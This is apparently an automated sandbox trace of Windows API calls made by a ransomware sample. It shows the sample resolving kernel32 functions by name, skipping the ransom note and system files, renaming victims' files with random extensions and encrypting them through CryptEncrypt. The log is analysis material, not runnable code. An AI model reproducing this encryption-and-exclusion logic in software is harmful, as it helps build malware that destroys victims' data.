lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0087.415] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0087.415] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0087.415] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0087.415] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0087.415] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0087.415] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0087.415] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0087.415] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0087.415] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0087.415] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0087.415] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0087.415] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0087.415] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0087.415] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0087.415] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0087.415] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0087.415] lstrlenA (lpString="CTRLROUTINE") returned 11 [0087.415] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0087.415] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0087.415] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0087.415] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0087.415] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0087.415] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0087.415] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0087.415] lstrlenA (lpString="DEBUGBREAK") returned 10 [0087.415] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0087.415] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0087.415] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0087.415] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0087.415] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0087.415] lstrlenA (lpString="DECODEPOINTER") returned 13 [0087.415] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0087.415] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0087.415] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0087.415] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0087.415] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0087.416] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0087.416] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0087.416] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0087.416] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0087.416] lstrlenA (lpString="DELETEATOM") returned 10 [0087.416] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0087.416] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0087.416] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0087.416] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0087.416] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0087.416] lstrlenA (lpString="DELETEFIBER") returned 11 [0087.416] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0087.416] lstrlenA (lpString="DELETEFILEA") returned 11 [0087.416] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0087.416] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0087.416] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0087.416] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0087.416] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0087.416] lstrlenA (lpString="DELETEFILEW") returned 11 [0087.416] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0087.416] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0087.416] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0087.416] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0087.416] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0087.416] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0087.416] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0087.416] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0087.416] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0087.416] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0087.416] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0087.416] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0087.416] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0087.416] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0087.416] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0087.416] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0087.416] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0087.416] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0087.417] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0087.417] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0087.417] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0087.417] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0087.417] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0087.417] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0087.417] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0087.417] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0087.417] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0087.417] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0087.417] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0087.417] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0087.417] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0087.417] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0087.417] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0087.417] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0087.417] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0087.417] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0087.417] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0087.417] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0087.417] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0087.417] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0087.417] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0087.417] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0087.417] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0087.417] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0087.417] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0087.417] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0087.417] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0087.417] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0087.417] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0087.417] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0087.417] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0087.417] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0087.417] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0087.417] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0087.417] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0087.418] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0087.418] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0087.418] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0087.418] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0087.418] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0087.418] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0087.418] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0087.418] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0087.418] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0087.418] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0087.418] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0087.418] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0087.418] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0087.418] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\IzbRoJNJtopbW6u9q.swf") returned 75 [0087.418] wsprintfW (in: param_1=0x3f2dea4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\IzbRoJNJtopbW6u9q.swf.l0s9Bl8") returned 83 [0087.418] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\IzbRoJNJtopbW6u9q.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ne-e0bic1cg5irwk\\izbrojnjtopbw6u9q.swf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\IzbRoJNJtopbW6u9q.swf.l0s9Bl8" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ne-e0bic1cg5irwk\\izbrojnjtopbw6u9q.swf.l0s9bl8"), dwFlags=0x0) returned 1 [0087.419] VirtualFree (lpAddress=0xfa0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.419] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.420] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.420] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb02f7200, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xb02f7200, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb02f7200, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0087.420] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0087.420] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0087.420] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0087.420] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0087.420] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0087.420] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0087.420] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0087.420] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0087.420] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0087.420] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0087.420] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0087.420] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0087.420] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0087.420] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0087.420] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0087.420] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\") returned 54 [0087.420] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0087.420] lstrcpyW (in: lpString1=0x3f2e6a4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\" [0087.420] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\jkbimi8.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\jkbimi8.tmp" [0087.420] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0087.421] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ne-e0bic1cg5irwk\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0087.421] CloseHandle (hObject=0x0) returned 0 [0087.421] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.421] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5708b4f0, ftCreationTime.dwHighDateTime=0x1d4c5c3, ftLastAccessTime.dwLowDateTime=0x287ebf0, ftLastAccessTime.dwHighDateTime=0x1d4c76a, ftLastWriteTime.dwLowDateTime=0x287ebf0, ftLastWriteTime.dwHighDateTime=0x1d4c76a, nFileSizeHigh=0x0, nFileSizeLow=0x5d0e, dwReserved0=0x0, dwReserved1=0x0, cFileName="KqLR.mp4", cAlternateFileName="")) returned 1 [0087.421] lstrcmpiW (lpString1="KqLR.mp4", lpString2="DECRYPT-FILES.txt") returned 1 [0087.421] lstrcmpiW (lpString1="KqLR.mp4", lpString2="autorun.inf") returned 1 [0087.421] lstrcmpiW (lpString1="KqLR.mp4", lpString2="boot.ini") returned 1 [0087.421] lstrcmpiW (lpString1="KqLR.mp4", lpString2="desktop.ini") returned 1 [0087.421] lstrcmpiW (lpString1="KqLR.mp4", lpString2="ntuser.dat") returned -1 [0087.421] lstrcmpiW (lpString1="KqLR.mp4", lpString2="iconcache.db") returned 1 [0087.421] lstrcmpiW (lpString1="KqLR.mp4", lpString2="bootsect.bak") returned 1 [0087.421] lstrcmpiW (lpString1="KqLR.mp4", lpString2="ntuser.dat.log") returned -1 [0087.421] lstrcmpiW (lpString1="KqLR.mp4", lpString2="thumbs.db") returned -1 [0087.421] lstrcmpiW (lpString1="KqLR.mp4", lpString2="Bootfont.bin") returned 1 [0087.421] lstrlenW (lpString="KqLR.mp4") returned 8 [0087.421] lstrcmpiW (lpString1="mp4", lpString2="lnk") returned 1 [0087.421] lstrcmpiW (lpString1="mp4", lpString2="exe") returned 1 [0087.421] lstrcmpiW (lpString1="mp4", lpString2="sys") returned -1 [0087.422] lstrcmpiW (lpString1="mp4", lpString2="dll") returned 1 [0087.422] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\") returned 54 [0087.422] lstrlenW (lpString="KqLR.mp4") returned 8 [0087.422] lstrcpyW (in: lpString1=0x3f2e6a4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\" [0087.422] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\", lpString2="KqLR.mp4" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\KqLR.mp4") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\KqLR.mp4" [0087.422] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0087.422] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\KqLR.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ne-e0bic1cg5irwk\\kqlr.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x428 [0087.422] GetFileSizeEx (in: hFile=0x428, lpFileSize=0x3f2de70 | out: lpFileSize=0x3f2de70*=23822) returned 1 [0087.422] CreateFileMappingW (hFile=0x428, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x42c [0087.422] MapViewOfFile (hFileMappingObject=0x42c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfa0000 [0087.422] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0087.422] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0087.422] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0087.423] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfb0000*, pdwDataLen=0x3f2ddd8*=0x28, dwBufLen=0x100 | out: pbData=0xfb0000*, pdwDataLen=0x3f2ddd8*=0x100) returned 1 [0087.423] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0087.423] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.424] UnmapViewOfFile (lpBaseAddress=0xfa0000) returned 1 [0087.424] CloseHandle (hObject=0x42c) returned 1 [0087.424] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0087.424] WriteFile (in: hFile=0x428, lpBuffer=0xfb0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2ddf8, lpOverlapped=0x0 | out: lpBuffer=0xfb0000*, lpNumberOfBytesWritten=0x3f2ddf8*=0x108, lpOverlapped=0x0) returned 1 [0087.425] CloseHandle (hObject=0x0) returned 0 [0087.425] CloseHandle (hObject=0x428) returned 1 [0087.425] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.425] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.425] GetTickCount () returned 0x114e4d4 [0087.425] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0087.426] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0087.426] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0xfa0000 [0087.426] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0087.426] lstrlenA (lpString="kernel32.dll") returned 12 [0087.426] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0087.426] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0087.426] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0087.426] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0087.427] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0087.427] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0087.427] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0087.427] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0087.427] lstrlenA (lpString="ADDATOMA") returned 8 [0087.427] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0087.427] lstrlenA (lpString="ADDATOMW") returned 8 [0087.427] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0087.427] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0087.427] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0087.427] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0087.427] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0087.427] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0087.427] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0087.427] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0087.427] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0087.427] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0087.427] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0087.427] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0087.427] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") 